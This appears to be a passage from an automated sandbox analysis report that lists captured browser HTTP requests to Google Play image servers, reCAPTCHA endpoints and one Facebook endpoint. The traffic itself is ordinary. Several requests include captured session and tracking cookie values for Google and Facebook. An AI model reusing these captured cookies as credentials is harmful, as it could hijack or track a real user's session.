image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bhwvgLPwlrUGC29L7T2GkUyJe7bPzKxeuRFxEHWG7RCFDP_PtJ5WPtdk6QW-KKMn7Zy2=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /JtygOZ9IrtJsXLqQ1DszTLkSGwcRYmOcI6YeBU0ul2vhh9FII7eqZa6Lk2VBcHQiQCav=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /d6Y9q1SJXDASeD-93qMXL59Bq_JCd6Bm1cZr_zodlkVnq4ck3TpTWYcMpBwOsUGMQHw=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /63RAiBrl7WNn4cjdnuJq66QMzv7Br8RFftmeCwSV_z6z_s3Z8HdIoYERwCEf01m3aQ=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /87mGXAuy0q0oyYxq5DNwHFzCByFtzDjw4clPWAURuOu3kRMcbWlwr0BzNfBNkz2wn2w=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /K6kGejYk6GTdg5AenV4A0e-Nc48xjZ_-Qj50IUO5pUCf0V6EpJbeOku4Rk73atcPD4A=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /LCVRRBHTcHs2NFs14MsnVMA51vENNhT-VUex4HRMXuBZmVJ1b6lJOTJnwC5LcSPurg=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /JtygOZ9IrtJsXLqQ1DszTLkSGwcRYmOcI6YeBU0ul2vhh9FII7eqZa6Lk2VBcHQiQCav=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bhwvgLPwlrUGC29L7T2GkUyJe7bPzKxeuRFxEHWG7RCFDP_PtJ5WPtdk6QW-KKMn7Zy2=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /63RAiBrl7WNn4cjdnuJq66QMzv7Br8RFftmeCwSV_z6z_s3Z8HdIoYERwCEf01m3aQ=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /LCVRRBHTcHs2NFs14MsnVMA51vENNhT-VUex4HRMXuBZmVJ1b6lJOTJnwC5LcSPurg=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?trustedtypes=true&render=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?trustedtypes=true&render=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /tools/feedback/chat_load.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0&co=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb206NDQz&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=invisible&cb=9vfd1mtb6k9g HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=6&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0&co=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb206NDQz&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=invisible&cb=9vfd1mtb6k9gAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /js/bg/dubcxWuhhbqw8uaLSFFGvELnk5WmffD3wjoYeQZ33gk.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0&co=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb206NDQz&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=invisible&cb=9vfd1mtb6k9gAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /js/bg/dubcxWuhhbqw8uaLSFFGvELnk5WmffD3wjoYeQZ33gk.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGteOyr_PAn6oH3UE9sWtgk3tOu9JkbCdTkj6rf8SrgGfZ5k2EUxzHO7iCu6wIX8K22nf5MZ2d9pChSpLqpBwPg; NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
